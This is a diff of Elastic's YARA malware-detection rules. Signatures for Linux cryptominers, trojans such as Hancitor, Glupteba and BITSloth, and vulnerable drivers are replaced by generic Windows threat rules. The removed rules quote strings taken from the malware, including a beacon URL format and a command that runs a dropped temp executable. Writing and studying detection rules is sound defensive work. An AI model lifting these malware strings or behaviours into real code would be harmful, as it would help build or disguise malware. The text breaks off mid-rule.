strings: - $a1 = { 50 51 52 53 55 56 57 E8 00 00 00 00 5B 81 EB ?? ?? ?? 00 BA 00 00 00 00 53 81 } - $a2 = { 81 C2 00 04 00 00 81 C3 00 04 00 00 } + $a1 = { 55 8B EC 8B 45 14 56 57 33 FF 3B C7 74 47 39 7D 08 75 1B E8 B2 2B 00 00 6A 16 5E 89 30 57 57 57 57 57 E8 3B 2B 00 00 83 C4 14 8B C6 EB 29 39 7D 10 74 E0 39 45 0C 73 0E E8 8D 2B 00 00 6A 22 59 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Bulz_2Aa8Fbb5 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_E052D248 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Bulz (Linux.Cryptominer.Bulz)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "2aa8fbb5-b392-49fc-8f0f-12cd06d534e2" - date = "2021-01-12" - modified = "2021-09-16" + id = "e052d248-32f2-4d51-b42d-468a09e06daa" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Bulz.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "21d8bec73476783e01d2a51a99233f186d7c72b49c9292c42e19e1aa6397d415" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L82-L100" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ed2bbc0d120665044aacb089d8c99d7c946b54d1b08a078aebbb3b91f593da6e" + logic_hash = "1a16ce6d1c6707560425156e625ad19a82315564b3f03adafbcc3e65b0e98a6d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c8fbeae6cf935fe629c37abc4fdcda2c80c1b19fc8b6185a58decead781e1321" - severity = 100 + fingerprint = "ccfbcb9271b1ce99b814cf9e3a4776e9501035166824beaf39d4b8cd03446ef3" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FE D7 C5 D9 72 F2 09 C5 E9 72 D2 17 C5 E9 EF D4 C5 E9 EF D6 C5 C1 } + $a1 = { 55 8B EC 64 A1 00 00 00 00 6A FF 68 4F 5A 54 00 50 64 89 25 00 00 00 00 6A 02 68 24 D0 58 00 E8 FF 65 10 00 C7 45 FC FF FF FF FF 68 10 52 55 00 E8 F7 72 10 00 8B 4D F4 83 C4 0C 64 89 0D 00 00 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Bulz_0998F811 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_2Bb7Fbe3 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Bulz (Linux.Cryptominer.Bulz)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "0998f811-7be3-4d46-9dcb-1e8a0f19bab5" - date = "2021-01-12" - modified = "2021-09-16" + id = "2bb7fbe3-2add-4ae9-adbf-5f043475d879" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Bulz.yar#L20-L37" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "178f6c42582dd99cc5418388d020d4d76f2a9204297a673359fe0a300121c35b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L102-L120" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "65cc8704c0e431589d196eadb0ac8a19151631c8d4ab7375d7cb18f7b763ba7b" + logic_hash = "36e1ab766e09e8d06b9179f67a1cb842ba257f140610964a941fb462ed3e803c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c8a83bc305998cb6256b004e9d8ce6d5d1618b107e42be139b73807462b53c31" - severity = 100 + fingerprint = "e20c20c61768bd936cc18df56d7ec12d92745b6534ac8149bf367d6ad62fa8bd" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 79 70 E4 39 C5 F9 70 C9 4E C5 91 72 F0 12 C5 F9 72 D0 0E C5 91 } + $a1 = { 83 EC 14 68 B6 32 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 30 53 56 57 89 65 EC C7 45 F0 C0 15 40 00 33 F6 89 75 F4 89 75 F8 89 75 E0 89 75 DC 89 75 D8 6A 01 FF 15 AC 10 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xhide_7F0A131B : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_994F2330 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xhide (Linux.Trojan.Xhide)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "7f0a131b-c305-4a08-91cc-ac2de4d95b19" - date = "2021-01-12" - modified = "2021-09-16" + id = "994f2330-ce61-4c23-b100-7df3feaeb078" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xhide.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0dc35f1a1fe1c59e454cd5645f3a6220b7d85661437253a3e627eed04eca2560" - logic_hash = "4843042576d1f4f37b5a7cda1b261831030d9145c49b57e9b4c66e2658cc8cf9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L122-L140" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0a30cb09c480a2659b6f989ac9fe1bfba1802ae3aad98fa5db7cdd146fee3916" + logic_hash = "ace99deae7f5faa22f273ec4fe45ef07f03acd1ae4d9c0f18687ef6cf5b560c2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "767f2ea258cccc9f9b6673219d83e74da1d59f6847161791c9be04845f17d8cb" - severity = 100 + fingerprint = "4749717da2870a3942d7a3aa7e2809c4b9dc783a484bfcd2ce7416ae67164a26" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 8B 85 68 FF FF FF 83 E0 40 85 C0 75 1A 8B 85 68 FF FF FF 83 } + $a1 = { 83 EC 0C 8B 55 08 85 D2 0F 84 C7 00 00 00 8B 42 3C 83 7C 10 74 10 8D 44 10 18 0F 82 B5 00 00 00 83 78 64 00 0F 84 AB 00 00 00 8B 4D 0C 8B 40 60 C1 E9 10 03 C2 66 85 C9 75 14 0F B7 4D } condition: all of them } -rule ELASTIC_Linux_Trojan_Xhide_Cd8489F7 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Bf7Aae24 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xhide (Linux.Trojan.Xhide)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "cd8489f7-795f-4fd5-b9a6-03ddd0f3bad4" - date = "2021-01-12" - modified = "2021-09-16" + id = "bf7aae24-f89a-4cc6-9a15-fc29aa80af98" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xhide.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0dc35f1a1fe1c59e454cd5645f3a6220b7d85661437253a3e627eed04eca2560" - logic_hash = "34924260c811f1796ae37faec922bc21bb312ebb0672042d3ec27855f63ed61e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L142-L160" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6dfc63894f15fc137e27516f2d2a56514c51f25b41b00583123142cf50645e4e" + logic_hash = "b6dfa6f4c46bddd643f2f89f6275404c19fd4ed1bbae561029fffa884e99e167" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "30b2e0a8ad2fdaa040d748d8660477ae93a6ebc89a186029ff20392f6c968578" - severity = 100 + fingerprint = "9304e9069424d43613ef9a5484214d0e3620245ef9ae64bae7d825f5f69d90c0" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 6F 74 2E 63 6F 6E 66 0A 0A 00 46 75 6C 6C 20 70 61 74 68 20 } + $a1 = { 48 33 F6 44 8B EE 48 89 74 24 20 8B EE 48 89 B4 24 A8 00 00 00 44 8B F6 48 89 74 24 28 44 8B E6 E8 BF FF FF FF 4C 8B F8 8D 5E 01 B8 4D 5A 00 00 66 41 39 07 75 1B 49 63 57 3C 48 8D 4A } condition: all of them } -rule ELASTIC_Linux_Trojan_Xhide_840B27C7 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_D542E5A5 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xhide (Linux.Trojan.Xhide)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "840b27c7-191f-4d31-9b46-f22be634b2af" - date = "2021-01-12" - modified = "2021-09-16" + id = "d542e5a5-0648-40de-8b70-9f78f9bd1443" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xhide.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0dc35f1a1fe1c59e454cd5645f3a6220b7d85661437253a3e627eed04eca2560" - logic_hash = "6b0bfe69558399af6e0469a31741dcf2eb91fbe3e130267139240d3458eb8a0d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L162-L180" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3fc4ae7115e0bfa3fc6b75dcff867e7bf9ade9c7f558f31916359d37d001901b" + logic_hash = "3c16c02d4fc6e019f0ab0ff4daad61f59275afd8fb3ee263b1b59876233a686e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f1281db9a49986e23ef1fd9a97785d3bd7c9b3b855cf7e51744487242dd395a3" - severity = 100 + fingerprint = "62d3edc282cedd5a6464b92725a3916e3bdc75e8eb39db457d783cb27afa3aec" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 8B 45 98 83 E0 40 85 C0 75 16 8B 45 98 83 E0 08 85 C0 75 0C 8B } + $a1 = { 55 8B EC 56 FF 75 08 8B F1 E8 B6 FF FF FF C7 06 AC 67 41 00 8B C6 5E 5D C2 04 00 8B FF 55 8B EC 56 FF 75 08 8B F1 E8 99 FF FF FF C7 06 B8 67 41 00 8B C6 5E 5D C2 04 00 B8 EF 5B 40 00 A3 E8 5A } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Toshibabios_2891972A : FILE +rule ELASTIC_Windows_Generic_Threat_8D10790B : FILE MEMORY { meta: - description = "Name: NCHGBIOS2x64.SYS, Version: 4.2.4.0" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "2891972a-901d-47d3-ae73-39b7c601dd19" - date = "2022-04-07" - modified = "2022-04-07" + id = "8d10790b-6f26-46bf-826e-1371565763f0" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_ToshibaBios.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073" - logic_hash = "c253181a754f421ee36ced994412672770497756848d78d557907957486e711b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L182-L200" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "911535923a5451c10239e20e7130d371e8ee37172e0f14fc8cf224d41f7f4c0f" + logic_hash = "84c017abbce1c8702efbe8657e5a857ae222721b0db2260dc814652f4528df26" score = 75 quality = 75 - tags = "FILE" - fingerprint = "154a771873bef03d1cc63cb2e270a62d42bbd2aa9027a59bc027b3ff88641192" - threat_name = "Windows.VulnDriver.ToshibaBios" + tags = "FILE, MEMORY" + fingerprint = "7cc33c6684318373e45f5e7440f0a416dd5833a56bc31eb8198a3c36b15dd25e" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 4E 00 43 00 48 00 47 00 42 00 49 00 4F 00 53 00 32 00 78 00 36 00 34 00 2E 00 53 00 59 00 53 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x02][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x04][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x02][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x03][\x00-\x00]))/ + $a1 = { 55 8B EC 81 EC 04 00 00 00 8B 5D 08 8B 1B 83 C3 04 89 5D FC 8B 45 0C 8B 5D FC 89 03 8B E5 5D C2 08 00 55 8B EC 81 EC 0C 00 00 00 C7 45 FC 00 00 00 00 68 00 00 00 00 BB C4 02 00 00 E8 0D 05 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Trojan_Hancitor_6738D84A : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_347F9F54 : FILE MEMORY { meta: - description = "Detects Windows Trojan Hancitor (Windows.Trojan.Hancitor)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "6738d84a-7393-4db2-97cc-66f471b5699a" - date = "2021-06-17" - modified = "2021-08-23" + id = "347f9f54-b9a6-4d40-9627-d3cef78f13eb" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Hancitor.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40" - logic_hash = "448243b6925c4e419b1fd492ac5e8d43a7baa4492ba7a5a0b44bc8e036c77ec2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L202-L220" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "45a051651ce1edddd33ecef09bb0fbb978adec9044e64f786b13ed81cabf6a3f" + logic_hash = "63df388393a45ffec68ba01ae6d7707b6d5277e0162ded6e631c1f76ad76b711" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912" - severity = 100 + fingerprint = "860f951db43fa3389c5057f7329b5d13d9347b6e04e1363dd0a8060d5a131991" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d" - $b1 = "Rundll32.exe %s, start" ascii fullword - $b2 = "MASSLoader.dll" ascii fullword + $a1 = { 83 EC 10 FF 75 0C 80 65 FC 00 8D 45 F0 C6 45 F0 43 50 C6 45 F1 6F FF 75 08 C6 45 F2 6E C6 45 F3 6E C6 45 F4 65 C6 45 F5 63 C6 45 F6 74 C6 45 F7 47 C6 45 F8 72 C6 45 F9 6F C6 45 FA 75 } condition: - $a1 or all of ($b*) + all of them } -rule ELASTIC_Windows_Vulndriver_Sandra_5D112Feb : FILE +rule ELASTIC_Windows_Generic_Threat_20469956 : FILE MEMORY { meta: - description = "Name: SANDRA, Version: 10.12.0.0" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "5d112feb-dc0a-464c-9753-695bb510f5a8" - date = "2022-04-07" - modified = "2022-04-07" + id = "20469956-1be6-48e8-b3c4-5706f9630971" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Sandra.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de" - logic_hash = "d234a1e74234400f51c2aa7a9fb1549be1bc422bdf585db7d2ec9ad1ec75e490" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L222-L240" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a1f2923f68f5963499a64bfd0affe0a729f5e7bd6bcccfb9bed1d62831a93c47" + logic_hash = "da351bec0039a32bb9de1d8623ab3dc26eb752d30a64e613de96f70e1b1c2463" score = 75 quality = 75 - tags = "FILE" - fingerprint = "13572e1155a5417549508952504b891f0e4f40cb6ff911bdda6f152c051c401c" - threat_name = "Windows.VulnDriver.Sandra" + tags = "FILE, MEMORY" + fingerprint = "67cec754102e3675b4e72ff4826c40614e4856b9cbf12489de3406318990fc85" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 53 00 41 00 4E 00 44 00 52 00 41 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x0c][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x09][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x0b][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $a1 = { 83 E4 F8 83 EC 5C 53 56 33 C0 C7 44 24 18 6B 00 6C 00 57 8D 4C 24 1C C7 44 24 20 69 00 66 00 C7 44 24 24 2E 00 73 00 C7 44 24 28 79 00 73 00 66 89 44 24 2C C7 44 24 0C 6B 00 6C 00 C7 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Vulndriver_Sandra_612A7A16 : FILE +rule ELASTIC_Windows_Generic_Threat_742E8A70 : FILE MEMORY { meta: - description = "Name: sandra.sys, Version: 10.12.0.0" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "612a7a16-b616-4a70-9994-cb5aebfa0ca9" - date = "2022-04-07" - modified = "2022-04-07" + id = "742e8a70-c150-4903-a551-9123587dd473" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Sandra.yar#L23-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8fda0e1775d903b73836d4103f6e8b0e2f052026b3acdb07bd345b9ddb3c873a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L242-L260" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "94f7678be47651aa457256375f3e4d362ae681a9524388c97dc9ed34ba881090" + logic_hash = "2925eb8da80ef791b5cf7800a9bf9462203ab6aa743bc69f4fd2343e97eaab7c" score = 75 quality = 75 - tags = "FILE" - fingerprint = "ead3bd8256fbb5d26c4a177298a5cdd14e5eeb73d9336999c0a68ece9efa2d55" - threat_name = "Windows.VulnDriver.Sandra" + tags = "FILE, MEMORY" + fingerprint = "733b3563275da0a1b4781b9c0aa07e6e968133ae099eddef9cad3793334b9aa5" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 73 00 61 00 6E 00 64 00 72 00 61 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x0c][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x09][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x0b][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $a1 = { 55 8B EC E8 96 FF FF FF E8 85 0D 00 00 83 7D 08 00 A3 A4 E9 43 00 74 05 E8 0C 0D 00 00 DB E2 5D C3 8B FF 55 8B EC 83 3D B0 E9 43 00 02 74 05 E8 BA 12 00 00 FF 75 08 E8 07 11 00 00 68 FF 00 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Trojan_Bitsloth_05Fc3A0A : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_79174B5C : FILE MEMORY { meta: - description = "Detects Windows Trojan Bitsloth (Windows.Trojan.BITSloth)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "05fc3a0a-ce19-4042-90f8-32a43f40616e" - date = "2024-07-16" - modified = "2024-07-26" + id = "79174b5c-bc1d-40b2-b2e9-f3ddd3ba226c" + date = "2023-12-18" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BITSloth.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0944b17a4330e1c97600f62717d6bae7e4a4260604043f2390a14c8d76ef1507" - logic_hash = "8210dc28cf408f7f836aad3c32868ea21dd0862070c2c37d98b089a80be9285e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L262-L280" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c15118230059e85e7a6b65fe1c0ceee8997a3d4e9f1966c8340017a41e0c254c" + logic_hash = "06a2f0613719f1273a6b3f62f248c22b1cab2fe6054904619e3720f3f6c55e2e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "520722d4502230eed76b0c53fffb90bd2b818256363bc1393f51c378ff6cdd9b" - severity = 100 + fingerprint = "1e709e5cb8302ea19f9ee93e88f7f910f4271cf1ea2a6c92946fa26f68c63f4d" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $str_1 = "/%s/index.htm?RspID=%d" wide fullword - $str_2 = "/%s/%08x.rpl" wide fullword - $str_3 = "/%s/wu.htm" wide fullword - $str_4 = "GET_DESKDOP" wide fullword - $str_5 = "http://updater.microsoft.com/index.aspx" wide fullword - $str_6 = "[U] update error..." wide fullword - $str_7 = "RMC_KERNEL ..." wide fullword - $seq_global_protocol_check = { 81 3D ?? ?? ?? ?? F9 03 00 00 B9 AC 0F 00 00 0F 46 C1 } - $seq_exit_windows = { 59 85 C0 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A 02 EB ?? 56 EB } + $a1 = { 83 EC 48 56 57 6A 0F 33 C0 59 8D 7D B9 F3 AB 8B 75 0C 6A 38 66 AB 8B 4E 14 AA 8B 46 10 89 4D FC 89 45 F8 59 C1 E8 03 83 E0 3F C6 45 B8 80 3B C1 72 03 6A 78 59 2B C8 8D 45 B8 51 50 56 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Glupteba_70557305 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_232B71A9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Glupteba (Windows.Trojan.Glupteba)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "70557305-3d11-4dde-b53b-94f1ecc0380b" - date = "2021-08-08" - modified = "2021-10-04" + id = "232b71a9-add2-492d-8b9a-ad2881826ecf" + date = "2023-12-20" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Glupteba.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ad13fd7968f9574d2c822e579291c77a0c525991cfb785cbe6cdd500b737218" - logic_hash = "f3eee9808a1e8a2080116dda7ce795815e1179143c756ea8fdd26070f1f8f74a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L282-L300" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1e8b34da2d675af96b34041d4e493e34139fc8779f806dbcf62a6c9c4d9980fe" + logic_hash = "c3bef1509c0d0172dbbc7e0e2b5c69e5ec47dc22365d98a914002b53b0f7d918" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "bac7daa5c491de8f8a75b203cdb1cdab2c10633aa45a82e6b04d2f577e3e8415" - severity = 100 + fingerprint = "908e2a968e544dfb08a6667f78c92df656c7f2c5cf329dbba6cfdb5ea7b51a57" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "%TEMP%\\app.exe && %TEMP%\\app.exe" - $a2 = "is unavailable%d smbtest" - $a3 = "discovered new server %s" - $a4 = "uldn't get usernamecouldn't hide servicecouldn't" - $a5 = "TERMINATE PROCESS: %ws, %d, %d" ascii fullword - $a6 = "[+] Extracting vulnerable driver as \"%ws\"" ascii fullword + $a1 = { 61 61 62 63 64 65 65 66 67 68 